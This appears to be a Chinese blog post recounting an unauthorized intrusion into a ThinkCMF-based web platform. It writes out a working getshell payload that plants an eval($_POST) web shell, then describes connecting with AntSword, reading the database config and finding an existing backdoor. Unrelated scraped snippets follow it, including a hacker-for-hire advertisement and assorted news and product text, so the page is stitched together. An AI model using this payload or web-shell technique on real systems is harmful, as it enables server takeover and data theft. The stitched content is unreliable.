记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程
拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。
进去之后在url处构造报错
查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" *** *** 521"]);?>')</php>
写入shell之后连接蚁剑,直接拿下
鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!
一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。
正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。
这。。。这TM。。。有人在代码里下毒。
拿着不知道是哪位好心人留下的后门,含泪登录了后台。
帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。
互联网行业中, KPI(Key Performance Indicator,关键绩效指标)是常见的工作目标制定方法之一。那么 KPI 怎么运用才能最准确地瞄准发力目标,引导员工前行呢。本文将以阿里为例...
随着人们生活水平的提高,健康成为了人们越来越关注的话题,健康、智能类型的商品已成为消费首选。中秋将至,我们都想为家人带上最好的礼物。其实关爱家人的健康,就是最好的礼物。水是生命之源,纯净的饮用水则是家...
中新网客户端北京1月9日电 明天(10日),2020年春运将正式开启。今年春运,预计全国旅客发送量将达到约30亿人次。其中,道路客运24.3亿人次,铁路4.4亿人次,民航7900万人次,水运4500万...
黑客攻击网站教程(黑客攻击视频教程)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业...
平时我们都会听到这孩子得了疝气。也就是腹股沟疝气,当婴儿哭闹时腹股沟部有肿块,可能就是出现腹股沟疝气。当这个病症无法靠药物治疗时通常可以进行手术。那么腹股沟疝气对孩子来说有什么危害呢,下面友谊长存小编...
【外交部回应美参议员妄图制裁中国:入戏太深】在5月13日外交部例行记者会上,发言人赵立坚回应了近期美国参议员妄图“制裁中国”的言行。他说:此前,美国政治家网站曝光了共和党参议院全国委员会向竞选机构发送...